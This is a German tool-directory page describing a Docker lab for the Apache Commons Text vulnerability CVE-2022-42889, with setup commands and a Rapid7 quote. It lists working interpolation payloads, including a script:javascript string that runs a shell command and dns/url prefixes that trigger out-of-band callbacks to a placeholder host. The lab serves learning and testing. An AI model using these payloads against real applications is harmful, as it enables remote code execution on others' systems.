Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-42889 — docker für CVE-2022-42889 | Kitploit
Tools/GitHubGitHub/necroteddy/cve-2022-42889
SchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungLabs & Praxis
GitHubnecroteddy/cve-2022-42889

CVE-2022-42889

docker für CVE-2022-42889

Repository anzeigen
1vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-42889-POC

Eine einfache Demo-Anwendung, die zeigt, wie die Schwachstelle CVE-2022-42889 ausgenutzt werden kann.
Nutzt OOB-Dienste (Out of Band), um dns- und url-Präfixe zu demonstrieren.

JavaDocs für die commons-text-Interpolation commons-text JavaDocs

Beispiel-Interpolationen

  • script:javascript ("${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/blop')}")
  • dns ("${dns:address|HOST}")
  • url ("${url:UTF-8:http://HOST")

Zitat von Rapid7

Die Schwachstelle wurde mit Log4Shell verglichen, da es sich um eine Schwachstelle auf Bibliotheksebene in einer Open-Source-Bibliothek handelt, die wahrscheinlich eine Vielzahl von Softwareanwendungen betrifft, die das entsprechende Objekt verwenden.
Erste Analysen deuten jedoch darauf hin, dass dieser Vergleich nicht angemessen ist. Aufgrund der Art der Schwachstelle wird es im Gegensatz zu Log4Shell selten vorkommen, dass eine Anwendung die anfällige Komponente von Commons Text verwendet, um nicht vertrauenswürdige, potenziell schädliche Eingaben zu verarbeiten.

Voraussetzungen

  • docker
  • java
  • maven

Java und Maven können übersprungen werden, wenn man das Image von Docker Hub abruft.

Verwendung

Anwendung bauen

root@kitploit:~
mvn clean package

Docker-Image bauen

root@kitploit:~
docker build -t cve-2022-42889-poc .
Tool herunterladen

Docker-Image ausführen

root@kitploit:~
docker run --rm -p 8081:8081 -t cve-2022-42889-poc

Anwendung aufrufen und Anweisungen befolgen

root@kitploit:~
open http://localhost:8081

Weitere Informationen

  • NIST NVD
  • Rapid 7